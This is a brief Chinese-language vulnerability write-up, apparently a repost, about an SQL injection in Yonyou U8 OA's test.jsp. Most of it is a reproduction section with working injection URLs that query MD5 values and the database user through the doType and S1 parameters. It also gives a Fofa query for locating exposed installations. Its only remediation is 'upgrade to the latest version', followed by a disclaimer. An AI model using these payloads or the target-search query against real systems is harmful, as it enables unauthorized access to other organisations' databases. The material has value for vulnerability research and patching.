影响范围
用友U8 OA
漏洞类型
SQL注入
利用条件
影响范围
漏洞概述
用友U8 OA test.jsp文件存在SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞
漏洞复现
登录页面如下
http://x.x.x.x:8081/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))
http://x.x.x.x:8081/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(user()))
或者直接查询user也可以:
http://x.x.x.x:8081/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20user())
漏洞检索
Fofa:
app="用友U8+OA基础版"
安全建议
升级到最新版本~
原文始发于微信公众号(七芒星实验室):用友U8 OA test.jsp SQL注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论